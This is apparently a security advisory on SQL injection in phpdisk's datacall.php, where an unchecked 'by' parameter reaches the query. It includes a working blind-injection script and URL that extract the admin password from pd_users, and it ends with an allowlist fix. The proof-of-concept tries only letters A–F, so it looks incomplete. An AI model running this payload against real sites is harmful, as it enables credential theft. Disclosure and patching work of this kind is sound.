phpdisk/api/datacall.php contains the following code ($type is read from the request earlier in the file and is not shown in this excerpt):

<?php
$order = trim(gpc('order', 'G', ''));
$by = trim(gpc('by', 'G', ''));
$limit = (int)gpc('limit', 'G', 0);
if (!$type || !$order || !$by || !$limit) {
    echo 'phpdisk Datacall Parameter is null or Error!';
    exit;
}
// Keyword blacklist, applied to $order only
$filter_arr = array('select', 'delete', 'update', 'insert');
for ($i = 0; $i < count($filter_arr); $i++) {
    if (strpos($order, strtolower($filter_arr[$i])) != false) {
        die('phpdisk Datacall Parameter Error!');
    }
}
if ($type == 'user') {
    echo '<ul>' . LF;
    // $order and $by are interpolated into the SQL unchanged
    $q = $db->query("select username,userid from {$tpf}users order by $order $by limit $limit");

Both $order and $by flow straight into the query. The author anticipated that SQL might be submitted through order and filtered it against a keyword blacklist, but did not expect that by can carry the same payload: it reaches the query with no check at all.

Vulnerability proof:

<?php
$file = 'http://localhost/phpdisk/api/datacall.php';
for ($i = 0; $i < 32; $i++) {
    $path = $i + 1;
    foreach (array('A', 'B', 'C', 'D', 'E', 'F') as $w) {
        $api = $file . '?type=user&by=' . urlencode('(if(select substring(password,' . $path . ',1) from pd_users where userid=1)=0x' . bin2hex($w) . '),userid,username))') . '&order=/**/&limit=1';
        if (strpos(file_get_contents($api), 'admin') != false) {
            echo $w;
            break;
        }
    }
}
// http://localhost/phpdisk/api/datacall.php?type=user&by=if%28%28%28select%201%20from%20pd_users%20where%20userid=1%20limit%201%29=2%29,userid,username%29&order=/**/&limit=1
?>

Solution: allow only the letters a-z in order and by.
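The fix stated above, applied as an allowlist rather than a blacklist, as an added example that is not phpdisk's own code. The helper names sanitize_datacall_params and build_user_query are hypothetical; the column names, table prefix and query shape follow the vulnerable query quoted above, and the sample inputs are constructed.

```php
<?php
// Added example (not phpdisk's own code): allowlist validation for the
// order/by/limit parameters of datacall.php. Helper names are hypothetical.

// Columns a caller may sort by; anything else is rejected outright.
$allowed_order = array('username', 'userid');
// Sort direction is restricted to these two literal keywords.
$allowed_by = array('asc', 'desc');

function sanitize_datacall_params($order, $by, $limit, array $allowed_order, array $allowed_by)
{
    $order = strtolower(trim($order));
    $by = strtolower(trim($by));

    // Only a-z may appear, and the value must also be a known column name.
    if (!preg_match('/^[a-z]+$/', $order) || !in_array($order, $allowed_order, true)) {
        return false;
    }
    // Same rule for the direction: a-z only, and one of the known keywords.
    if (!preg_match('/^[a-z]+$/', $by) || !in_array($by, $allowed_by, true)) {
        return false;
    }
    // limit is cast to int and clamped to a sane range.
    $limit = (int)$limit;
    if ($limit < 1 || $limit > 100) {
        return false;
    }
    return array('order' => $order, 'by' => $by, 'limit' => $limit);
}

function build_user_query($tpf, array $p)
{
    // Every interpolated value came from a fixed allowlist, so the SQL shape
    // cannot be altered by request input.
    return "select username,userid from {$tpf}users order by {$p['order']} {$p['by']} limit {$p['limit']}";
}

// Constructed sample inputs: a legitimate request, then the injected `by`
// pattern from the report with the comment-only `order` it relied on.
$good = sanitize_datacall_params('userid', 'desc', '1', $allowed_order, $allowed_by);
$bad  = sanitize_datacall_params('/**/', '(if((select 1)=2),userid,username))', '1', $allowed_order, $allowed_by);

echo $good ? build_user_query('pd_', $good) . "\n" : "rejected\n";
echo $bad ? build_user_query('pd_', $bad) . "\n" : "rejected\n";
```

The blacklist in the original code only inspects order and only looks for four keywords, so a payload that uses none of them, or that arrives through by, passes. Checking both parameters against a fixed set of column names and directions, and casting limit, removes the interpolation problem instead of trying to enumerate bad inputs.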